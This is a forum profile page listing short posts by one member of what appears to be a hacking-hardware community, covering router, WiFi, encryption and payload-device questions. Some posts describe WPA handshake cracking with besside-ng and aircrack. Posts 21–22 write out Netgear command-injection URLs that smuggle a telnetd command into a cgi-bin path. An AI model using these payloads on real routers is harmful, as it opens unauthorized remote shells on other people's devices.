Jump to content

anode

Active Members
  • Posts

    197
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by anode

  1. anode

    Blunder Bug

    Might be able to use a Orange Pi, ODroid or the like with Android installed.
  2. anode

    Blunder Bug

    depends on how you use it :) (I'm sure I can screw it up)
  3. Either English is far from your first language or you are totally clueless on basic networking/TCP stack. (I'm thinking a little from column A ,a little from column b......)
  4. And asking security focused people.
  5. I think xmpp recently had a long running vuln discovered. (If that is what is actually running on 5222)
  6. Since just a basic browse shows a blank page, how are you losing income? Looks pretty standard: web, mail, and dns Not shown: 65525 filtered ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp closed https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 8000/tcp closed http-alt
  7. Maybe? ping -c 1 webstite.com If you want all the open ports nmap -p- webstie.com (will only do TCP ports I think -sU does the UDP) Do keep in mind that many websites may 'share' the same IP address on shared hosting.
  8. Look at your router/modem's WPS settings. You may need to change them, so the client can initiate the exchange. Or, non WPS: besside-ng (from aircrack-ng) to get 4way handshake then into aircrack, JtR, hashcat, etc.
  9. If I made a hidden volume inside a 'crypt container on a USB thumbdrive, how resilience is it to unplugging the drive while mounted? I guess should also ask about full disk encryption too.
  10. anode

    sshd config Q

    I'm probably going to do a bad job asking this but..... Can one configure sshd to only connect with clients that already have the key in known_hosts? ie: Not offer the server's public key to the client on first connection. So if the client doesn't have the server's public key, its just gets a connection refused. This would be linux; raspbian or kali on a Pi. (server)
  11. anode

    Overheating?

    Have issues with exfil. Copying about 450 files totaling 150MB *always* fails. Wether by script/payload or just mass storage drag-n-drop. When by payload it it does a self eject with the typical OS warning. When by D-n-D, it just hangs after abut 15MB. (have to yank out) Bunny gets rather warm too. (Mac OSX is the host PC)
  12. Yup that was it. Saw another post, but it didn't sink in as to why. Makes sense now. Thanks!
  13. For some reason when I quack a ~/ it is played back as /root/ ~/ works fine manually typed in a terminal I tried a simple just quack it into text editor and same results; /root/ MAC OSX 10.9 Mavericks. edit: Just tried on a Kali laptop same results. Both machine bare iron, not VMs.
  14. Not if lipo. They need special charging. Plenty of chips out there that do it.
  15. This was one of my first thoughts. I was thinking just a coin cell battery to boot it, then plug in/attack. Doesn't need to run it for long. But for v2.0, how about a usb port out the back for battery, wifi, ethernet, etc? And the battery could/should be pass through.
  16. Actually it is updated, if you use opkg. (but problem still is there) And it has a working besside-ng! Made a *very* crude/kludgey alpha module for it. (is there anything before alpha?)
  17. Kinda minor, but on network page, an option to save AP names with a drop down. And option to hide management SSID.
  18. Been playing with Site Survey module and pop over on SSH and run aircrack-ng <capfile> -J <hccap> And it seems to run OK. But over on the hashcat rig (3.20 Ubuntu server 16.04.1) fails with a incorrect epol length. Copying the cap file over the the hashcat rig and using AC (v 1.2 beta 3) there works perfectly. The Nano's AC version is 1.2 rc2 (my kali box is 1.2 rc3, which also works)
  19. I've swapped around the single double quotes in all sorts of combos. $IFS as a shell variable. Its equated to a space. (on both systems) It works *perfectly* inside a web browser. I'm trying to get it to work with wget or curl. Getting telnet running on default port 23 is no prob. But would be nice to add arguments and options to do a 'killall' (and I *do* thank you for your all your help (globally here). You're a good/helpful guy here. ...When Diginija speak, hackers listen (old US inside joke)
  20. $IFS is a space on both systems.
  21. Thanks!! Been messing around with quotes, and made some progress. wget "-IP-/cgi-bin/;telnetd" This works great. But once I try to add/stack it fails. The $IFS (space) matches on both the host and target
  22. Been playing with the command injection vuln on the Netgear routers. Works great from a browser. I just have no chops with wget/curl. And would like to exploit via commandline. I've tried: wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23' I've even tried lynx but no love there either.
  23. *what* settings? Some may not take effect until reboot, service restart, etc. registry is a standard place for settings. http://ss64.com/nt/reg.html
  24. Cool. So its the semi-false thick hard to bend wire claim. Yes, 10 gauge THHN solid is stiff, but 000 welding cable is rather supple. Its not the gauge, but the number of strands (and their individual diameter) along with the insulation. (think drone/RC silicone wire)
×
×
  • Create New...